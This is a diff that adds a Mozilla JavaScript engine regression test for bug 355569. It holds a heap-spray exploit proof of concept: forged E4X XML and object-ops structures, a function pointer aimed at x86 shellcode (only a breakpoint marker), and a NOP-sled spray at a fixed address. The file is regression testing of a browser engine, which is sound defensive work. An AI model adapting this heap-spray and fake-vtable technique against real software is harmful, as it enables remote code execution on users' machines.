1.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000
1.2 +++ b/js/src/tests/js1_8_5/regress/regress-355569.js Wed Dec 31 06:09:35 2014 +0100
1.3 @@ -0,0 +1,127 @@
1.4 +/* -*- Mode: java; tab-width:8; indent-tabs-mode: nil; c-basic-offset: 4 -*- */
1.5 +
1.6 +/* This Source Code Form is subject to the terms of the Mozilla Public
1.7 + * License, v. 2.0. If a copy of the MPL was not distributed with this
1.8 + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
1.9 +
1.10 +var bug = 355569;
1.11 +var actual = '';
1.12 +var expect = '';
1.13 +
1.14 +printBugNumber (bug);
1.15 +printStatus (summary);
1.16 +
1.17 +var targetAddress = 0x12030010;
1.18 +var sprayParams = {
1.19 + chunkSize: 16 * 1024 * 1024,
1.20 + chunkCount: 16,
1.21 + chunkMarker: 0xdeadface,
1.22 + chunkAlign: 0x1000,
1.23 + reservedSize: 1024
1.24 +};
1.25 +
1.26 +function makeExploitCode() {
1.27 + /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
1.28 + return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
1.29 +}
1.30 +
1.31 +/*==========================================================================*/
1.32 +/*==========================================================================*/
1.33 +
1.34 +function packData(template, A) {
1.35 + var n = 0, result = "", vl;
1.36 + for(var i = 0; i < template.length; i++) {
1.37 + var ch = template.charAt(i);
1.38 + if(ch == "s" || ch == "S") {
1.39 + vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
1.40 + } else if(ch == "l" || ch == "L") { // XXX endian
1.41 + vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
1.42 + } else if(ch == "=") {
1.43 + result += String(A[n++]);
1.44 + }
1.45 + }
1.46 + return result;
1.47 +}
1.48 +function buildStructure(worker, address) {
1.49 + var offs = {}, result = "", context = {
1.50 + append: function(k, v) { offs[k] = result.length * 2; result += v; },
1.51 + address: function(k) { return address + ((k && offs[k]) || 0); }
1.52 + }; worker(context); result = ""; worker(context); return result;
1.53 +}
1.54 +function repeatToLength(s, L) {
1.55 + if(L <= s.length) { return s.substring(0, L); }
1.56 + while(s.length <= L/2) { s += s; }
1.57 + return s + s.substring(0, L - s.length);
1.58 +}
1.59 +function sprayData(data, params, rooter) {
1.60 + var marker = packData("L", [ params.chunkMarker ]);
1.61 + data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
1.62 + data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
1.63 + for(var i = 0; i < params.chunkCount; i++) {
1.64 + rooter[i] = marker + data + i;
1.65 + }
1.66 +}
1.67 +
1.68 +function T_JSObject(map, slots)
1.69 +{ return packData("LL", arguments); }
1.70 +function T_JSObjectMap(nrefs, ops, nslots, freeslot)
1.71 +{ return packData("LLLL", arguments); }
1.72 +function T_JSObjectOps(
1.73 + newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
1.74 + getProperty, setProperty, getAttributes, setAttributes,
1.75 + deleteProperty, defaultValue, enumerate, checkAccess,
1.76 + thisObject, dropProperty, call, construct,
1.77 + xdrObject, hasInstance, setProto, setParent,
1.78 + mark, clear, getRequiredSlot, setRequiredSlot
1.79 +) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }
1.80 +
1.81 +function T_JSXML_LIST(
1.82 + object, domnode, parent, name, xml_class, xml_flags,
1.83 + kids_length, kids_capacity, kids_vector, kids_cursors,
1.84 + xml_target, xml_targetprop
1.85 +) { return packData("LLLLSS LLLL LL", arguments); }
1.86 +function T_JSXML_ELEMENT(
1.87 + object, domnode, parent, name, xml_class, xml_flags,
1.88 + kids_length, kids_capacity, kids_vector, kids_cursors,
1.89 + nses_length, nses_capacity, nses_vector, nses_cursors,
1.90 + atrs_length, atrs_capacity, atrs_vector, atrs_cursors
1.91 +) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }
1.92 +
1.93 +/*==========================================================================*/
1.94 +/*==========================================================================*/
1.95 +
1.96 +function makeExploitData(address) {
1.97 + return buildStructure(function(ctx) {
1.98 + ctx.append("xml-list",
1.99 + T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
1.100 + ctx.append("xml-kids-vector",
1.101 + packData("L", [ ctx.address("xml-element") ]));
1.102 + ctx.append("xml-element",
1.103 + T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
1.104 + ctx.append("object",
1.105 + T_JSObject(ctx.address("object-map"), 0));
1.106 + ctx.append("object-map",
1.107 + T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
1.108 + ctx.append("object-ops",
1.109 + T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
1.110 + ctx.append("exploit-code",
1.111 + makeExploitCode(ctx));
1.112 + }, address);
1.113 +}
1.114 +
1.115 +function exploit() {
1.116 + sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
1.117 + var numobj = new Number(targetAddress >> 1);
1.118 + printStatus("probably not exploitable");
1.119 +}
1.120 +
1.121 +try
1.122 +{
1.123 + exploit();
1.124 +}
1.125 +catch(ex)
1.126 +{
1.127 +}
1.128 +
1.129 +reportCompare(expect, actual);
1.130 +
